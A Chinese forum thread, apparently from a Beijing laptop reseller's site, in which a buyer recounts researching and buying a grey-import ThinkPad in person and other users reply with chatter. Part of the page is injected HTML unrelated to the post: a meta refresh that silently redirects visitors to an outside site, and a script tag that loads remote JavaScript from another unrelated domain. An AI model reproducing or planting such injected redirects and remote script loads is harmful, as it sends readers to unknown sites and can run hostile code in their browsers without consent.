开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 俺的小黑!E81!!!(可以看见俺的小三的靓照哦!)

因为要出国了,听前辈们说一台好的笔记本很重要,我以前的那台12.1的DELL笔记本(奔三800低电压版的CPU,很经典)也到了该淘汰的时候了,所以买台新的笔记本就提上了我的日程。因为五一有优惠,所以决定那时候出手。

当时是4月底,离五一还有1个月,挑选电脑的时间还是很充裕的,整整一周,每天晚上我都会查各个品牌笔记本的资料,最终锁定了华硕和宏基这两个台湾省品牌,周末就去那两个专卖店踩点去了,也选中了自己中意的机子,但是有点不爽的是听一些人说这两个品牌的笔记本质量不是很好,我也没有太往心里去。过了两天,听说我的一个同学上个月买了宏基的一款低端的机子,我就向他打听了宏基的机子怎么样,他回答的很干脆:千万别买!!质量太差!!当时我就很郁闷,我就说:那华硕怎么样。同样干脆的话:一个吊样!!我无语了,当你认准的东西被人通过实践全盘否定的时候,你会变得有点迷茫,我当时就那样,漫无目的的在网上溜达。忽然路过了一个帖子,有个回帖说买IBM水货i机!
我的头上突然亮了一盏灯泡!对啊,以前就对IBM的水货机有点印象,只不过没有深入的去研究,现在既然没有了目标,何不去了解了解阿!经过大约5个小时的搜寻探索,我起身大呼,就丫的了!!!

既然决定了买水货,那么我就不得不找一个信誉好的商家了。首先考虑的是我所居住的这个城市的商家,在网上搜寻半天,还真找到一家看起来很专业的卖水的论坛,注册帐号,开始潜水(嘿嘿,这习惯不是很好),恩,不错,机子确实很便宜,各种规矩也定得井井有条,真的心动了,当时离五一还有大约10天吧,决定先去踩踩点。第二天我就去了那个卖水的地方,地点在我们那的一个电子城里面,到了那门口,我就不打算再进去了,一目了然了,很烂!!很郁闷!!想买个本咋这么难哪!!

回家,接着在网上打听寻找信息,发帖,留言之类无不都用了,结果不错,还真让我打听到了几家卖水的不错的商家,可惜都不在本市,问题来了,是邮购还是当面交易,经过激烈的思想斗争,终于还是决定当面交易,毕竟10000多元不是小数目阿!当时有三个选择摆在我面前:北京,上海,南京这三个地方。最后还是决定去北京啦!10年没去过了,正好五一黄金周到了,顺便旅游吧!!

既然选择去了北京,那么翔意这家老字号当然成了我的首选商家!但是,货比三家这么经典的规则我也不得不考虑,我还选择了其他两家听说还不错的水商。最终经过不断的打听询问,感觉还是选老字号比较放心,毕竟,买水的东西不选个有信誉有保障的商家实在放心不下阿!

上qq和翔意的人联系,加了一个名叫“翔意购物管理”(头像是个兔子)的人,向他询问了点关于价格之类的事情,这人给我的感觉是:好吊的一个人啊!!说话从不多说一个字,凡是和生意不相关的问题决不回答,冷的要死。。。。。。说真话,当时我还真的有点犹豫了,这种态度的卖家能行吗??突然,我的qq上有个陌生人的头像闪了起来,一谈话,他也是打算买水的人,看见我在翔意上的帖子,所以想和我聊聊。我们聊了一个晚上,那天晚上我就没睡好觉。。。因为他听好多人说现在的水货好多都有猫腻,在这么多卖水的商家中选一个是在是不容易的事情。。。我听了后很担心阿!但是后来想,大家都不是傻子,如果真有猫腻的话,早就有人投诉了,我也在百度上搜过关于翔意的评价,除了有一个说他态度不好的,其他还真没有什么,我觉得这就够了,机器质量过得去,这就是最重要的!!!第二天我又和那个人聊了很长时间,他也被我说动了,最后也打算在翔意买机子(5.6买了)!

艰苦的等到了4月底,29号晚上,我和父母踏上了开往北京的列车。。。。。。

我们30号早上到达目的地,居住的地方是在翠微路那边的一个高层小区内,因为翔意10点才开门,所以我们先去吃了早点,办了点其他的事情,大约中午11点钟,其他的事情都忙完了,才去的翔意。坐地铁到朝阳门,从A口出来,因为施工,这里有点杂乱,还好天辰大厦楼比较高,牌子比较大,才不至于那么难找。进了大厦,保安上来询问,我说去12楼,那个保安马上笑着说,去翔意买电脑阿!。。。汗。。。乘电梯直达12楼(那个电梯好快啊!)进了翔意的门,首先映入眼帘的果然是那传说中的满墙的包包!里面人好多阿!!买机的,询问的。。。感觉屋子还是太小了。。。然后一个女的(丫头?)上来询问,我说我要E81 ,她说好,让我等会,当时到了吃饭时间,我和父母都有点饿了,所以我们就先去楼下找地方吃饭去了。回到翔意,人还是那么多,正好我来时有一个哥们在和一女同志一起买了IBM和苹果,现在刚装好系统,打算走了,我接着补上,开始验机。everything goes well!!除了电源无法保证和原机配套,其他都可以!选择了一号套餐,加了两G内存,又买了内胆和转接线,付款,13110(汗,不给讲价阿!)拿出翔意的chost盘,开始做中文系统,这之间闲来无事,开始用俺的小三拍照(见照片)。。。大约半小时之后,全都弄好了,返程!

回到家,小心翼翼的拿出小黑,抚摸她那滑嫩的肌肤。。。。。。::78:: ,确实不错,娃哈哈哈哈哈。。。

这次购机基本上很成功!为什么说是基本上那?因为机子有那么一点不算瑕疵的瑕疵----光驱不是那么容易卡回去,有点费力,我是30号晚上发现这个问题,翔意那边肯定下班了,而且1号2号他们还放假。所以只好等到3号去看看了。愉快而疲惫的玩了两天,3号一大早我就去了翔意(因为下午要回家了),到了那里,人还是很多阿,生意真是太好了,这更加坚定了我在这买机是正确的结论!把问题和那边的工作人员说了一下,也看了一下,他说没有问题,有些机子就是这样,不影响什么的,放心了。。。

下午6点钟,我们拿着返程的车票离开了这繁华之地。。。。。。

+500---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 500

传说中的包包墙!!!~还有嘿嘿,偷拍。。。。
嘿嘿,装系统那!!期待中。。。。。
拿到北京的家中,细细观赏:)
拿回家喽!!!顺便让大家看看俺的小三,上面的照片可都是他拍的!!!

加分啊!!!!
刚看了一遍,流水帐啊,唉,学工科的,作文不咋地。。。。。

恭喜呢,加入小黑阵营

部队壮大了。人气越来越旺了
生意越来越火呢,希望在各地都能开店的说~那就相当的方便咯~

西安什么时候开分公司?

西安的大学不少呀?市场一定也不错!
简单说两句.QQ上客户每天上百个.如果每个人都长话连篇我们得累得吐血,回答简单明了就好.
小三不错,小黑更好!
楼主是要去Korea吗?看见你的香烟了

回复 #13 moonlet 的帖子

呵呵,那是朋友带来的,说是金正日抽的烟
N73网络版,不错
PX100,很长时间没听了
LZ用相机拍的第三张对焦没有对准
还有那块似有若无的表也看不清楚
要顶·········羡慕!!!!
LZ应该是山东的…… 感觉
那盒煙叫啥名字啊?朝鮮的?
俺是江苏的...
那烟俺也不知道叫啥名字,反正味道不咋样
那块表没有刻意去照它,也是港货,阿迪的,嘿嘿
有米人啊,烟是朝鲜的,表是香港的,本本也不是本地的
怎么不在成都建个据点呢,西南重镇啊
森海
Nokia
adidas
都是我喜欢的东西,支持LZ

另外,烟能不抽就不要抽了,以后不待国内连应酬的理由也找不到了
不错的,一样的心态阿,恭喜了。。
嘿,已经戒烟了,桌上那包是留着给别人抽的
有米不能这么糟蹋啊,都备下双份更厉害了
写得不错!